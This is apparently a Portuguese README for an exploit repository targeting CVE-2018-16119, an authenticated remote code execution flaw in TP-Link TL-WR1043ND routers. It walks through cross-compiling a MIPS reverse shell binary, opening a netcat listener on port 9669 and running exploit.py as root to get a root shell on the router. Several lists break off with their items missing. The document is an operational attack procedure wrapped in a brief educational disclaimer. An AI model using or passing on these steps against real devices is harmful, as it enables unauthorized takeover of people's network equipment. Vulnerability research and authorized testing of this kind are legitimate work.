
TP-Link TL-WR1043ND - Execução Remota de Código Autenticada
CVE-2018-16119 é uma vulnerabilidade crítica de execução remota de código autenticada que afeta roteadores TP-Link TL-WR1043ND. Esta vulnerabilidade permite que atacantes autenticados executem comandos arbitrários no dispositivo alvo com privilégios de root, podendo levar ao comprometimento completo do sistema.
Detalhes do CVE: CVE-2018-16119
Uma vez explorada, um atacante obtém acesso shell root ao roteador, permitindo:
# Install required packages
sudo apt-get update
sudo apt-get install netcat docker.io
O exploit requer um binário MIPS big-endian de reverse shell. Siga estes passos para compilá-lo:
# Copy the source code to /tmp
cp exploit/tftp_server/reverse_shell_mipsbe.c /tmp/
# Use Docker container with MIPS cross-compilation tools
docker run -v /tmp/:/tmp/ -it asmimproved/qemu-mips /bin/bash
Dentro do contêiner Docker:
cd /tmp
mips-linux-gnu-gcc -static reverse_shell_mipsbe.c -o shh
Saia do Docker e copie o binário compilado:
cp /tmp/shh exploit/tftp_server/
Abra um terminal e inicie um listener netcat na porta 9669:
Linux:
nc -l -p 9669 -vv
macOS:
nc -l 9669 -vv
Execute o script de exploit com privilégios de root (necessário para o servidor TFTP):
sudo python3 exploit/exploit.py
O script irá:
Uma vez que a conexão for estabelecida:
CVE-2018-16119/
├── exploit/
│ ├── exploit.py # Main exploit script
│ ├── requirements.txt # Python dependencies
│ ├── notes.txt # Additional notes
│ └── tftp_server/
│ ├── reverse_shell_mipsbe.c # Reverse shell source code
│ └── shh # Compiled MIPS binary
├── firmware/
│ └── wr740nv4_webrevert.bin # Sample firmware
├── squashfs-root/ # Extracted firmware filesystem
└── README.md # This file
Esta vulnerabilidade foi divulgada de forma responsável e deve ser usada apenas para:
⚠️ AVISO: Este exploit é fornecido apenas para fins educacionais e de testes autorizados. O acesso não autorizado a sistemas de computador é ilegal e antiético. Os usuários são responsáveis por garantir que tenham a devida autorização antes de usar esta ferramenta.
Instale os requisitos Python:
pip3 install -r exploit/requirements.txt
Permissão Negada no Servidor TFTP:
Falha na Conexão:
Sem Resposta do Shell:
id ou pwdEsta pesquisa demonstra falhas críticas de segurança no firmware de dispositivos embarcados. A vulnerabilidade destaca a importância de:
Pesquisa por: Alejandro Parodi
Twitter: @hdbreaker
LinkedIn: Alejandro Parodi
Esta pesquisa foi conduzida para fins educacionais e para melhorar a segurança de sistemas embarcados. Por favor, use com responsabilidade.